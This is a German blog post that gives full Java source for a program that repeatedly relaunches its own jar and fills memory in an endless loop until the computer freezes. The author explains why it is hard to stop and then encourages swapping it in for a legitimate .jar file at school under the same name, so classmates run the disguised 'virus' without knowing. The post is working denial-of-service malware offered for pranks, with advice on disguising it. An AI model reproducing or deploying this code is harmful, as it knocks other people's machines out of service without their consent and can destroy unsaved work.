PC aufhängen mit Java

Hallo liebe Nerds,

diejenigen von euch, die Java verstehen, werde den folgenden Code vielleicht verstehen:


public class Bluescreen{
public static final Map Objects = new HashMap();
public static double d = 0.0;

public static void main(String[] args) throws InterruptedException, IOException{
String jarname = new File(Bluescreen.class.getProtectionDomain().getCodeSource().getLocation().getPath()).getName();
Runtime.getRuntime().exec("java -jar " + jarname);
while(true){
Objects.put(Double.valueOf(d), Double.valueOf(d));
d += 1.0D;
}
}
}

WordPress scheint diesen Code nicht anständig einrücken zu wollen…

Wie auch immer.
Was macht dieses kleine Programm nun? Kurz gesagt: Es füllt den Arbeitsspeicher und lastet die CPU komplett aus.
Es ist übrigens egal, wie gut der PC ist, auf dem dieses Programm ausgeführt wird. Außerdem ist es Plattformunabhängig.

Jetzt die lange Erklärung:
Der String „jarname“ ist der Pfad zur .jar-Datei, aus der das Programm gestartet wurde.
Mithilfe von Runtime.getRuntime.exec(String) wird nun in der Kommandozeile des jeweiligen betriebssystems der Befehl „java -jar [jarname]“ ausgeführt, also wird das Programm noch mal gestartet.
In der Endlosschleife werden jetzt lediglich ständig Doubles in eine Liste geschrieben, um den RAM zu füllen.

Es ist extrem schwer, das Programm wieder zu beenden, da es sich ja selbst ständig startet.
Selbst, wenn man es schafft, den task-Manager zu starten, ist das Programm meist schon so weit, dass der Task-Manager sich einfach aufängt.
Wenn man zu lange wartet, ist die einzige Möglichkeit, 5 Sekunden lang den Power-Button zu drücken.

Ein großer Spaß ist das jetzt, wenn man in der Schule eine .jar-Datei mit dieser ersetzt und dann gleich benennt und die alte Datei löscht.
Jetzt doppelklicken natürlich alle den „Virus“ und wundern sich, warum der PC nicht mehr reagiert.
Da das Programm vollständig im Hintergrund arbeitet und für den Nutzer nichts zu sehen ist, außer, dass der PC nicht mehr reagiert, versteht keiner, was los ist 😀

Viel Spaß mit dem Code-Fetzen, wenn jemand Bock hat, damit Unsinn zu treiben!

Liebe Grüße,
Euer Neji

Speichere in deinen Favoriten diesen permalink.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.